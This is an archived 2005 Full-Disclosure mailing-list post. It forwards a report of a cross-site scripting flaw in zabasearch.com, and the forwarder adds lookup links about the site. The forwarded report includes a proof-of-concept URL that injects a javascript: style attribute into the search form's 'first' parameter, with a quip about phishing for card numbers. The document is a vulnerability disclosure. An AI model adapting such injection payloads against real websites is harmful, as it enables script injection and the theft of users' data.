[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Fwd: [Full-disclosure] ZabaSearch.com XSS
- To: Full-Disclosure@xxxxxxxxxxxxxxxxx
- Subject: Fwd: [Full-disclosure] ZabaSearch.com XSS
- From: Zainal Abidin Ahmad <kembarawan@xxxxxxxxx>
- Date: Mon, 16 May 2005 13:50:07 +0800
ZABA happens to be my initials, but I have nothing to do with
zabasearch.com<http://zabasearch.com/>
I Googled related sites:
http://www.google.com/search?hl=en&ned=us&q=inurl%3Azabasearch&btnmeta%3Dsearch%3Dsearch=Search+the+Web
Snopes latest finding on the site:
http://www.snopes.com/computer/internet/zabasearch.asp
then clicked down to:
http://www.wired.com/news/privacy/0,1848,67407,00.html
<snip>
Wired News sat down with Robert Zakari, ZabaSearch president and general
counsel, and chairman Nicholas Matzorkis, to talk about ZabaSearch
<snip>
They've been up since April-05?
http://uptime.netcraft.net/up/graph?mode_u=on&site=ZabaSearch.com&mode_w=off&avg_days=360&submit=Redisplay+Graph
Now on Zaba, Inc. 135 N. Los Robles Ave. Suite 850 Pasadena CA US 91101 :
http://uptime.netcraft.net/up/hosted?netname=INAP-HOU-ZABA-2018,216.52.81.192,216.52.81.255
Tested on R. Scott Perry's dnsreport.com <http://dnsreport.com/>:
http://www.dnsreport.com/tools/dnsreport.ch?domain=ZabaSearch.com
Also avail, RSP's dnsstuff.com <http://dnsstuff.com/>, netmechanic,
visualware, ...
ZABA
PS:
You may also exhaustively check out your own sites, online ebanking and
other URLs of interest.
---------- Forwarded message ----------
From: bitlance winter <bitlance_3@xxxxxxxxxxx>
Date: May 16, 2005 1:06 PM
Subject: [Full-disclosure] ZabaSearch.com <http://zabasearch.com/> XSS
To: Full-Disclosure@xxxxxxxxxxxxxxxxx
Hello.
ZabaSearch.com <http://zabasearch.com/> XSS 8-(
Unbelievable.
Please Input your Credit Card Number...
http://www.zabasearch.com/find_anyone_form_t.php?first=f"style=
background-image:url(javascript:alert());"
See also .
http://www.wired.com/news/privacy/0,1848,67407,00.html
02:00 AM May. 06, 2005 PT
bitlance winter
_________________________________________________________________
Don't just search. Find. Check out the new MSN Search!
http://search.msn.click-url.com/go/onm00200636ave/direct/01/
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/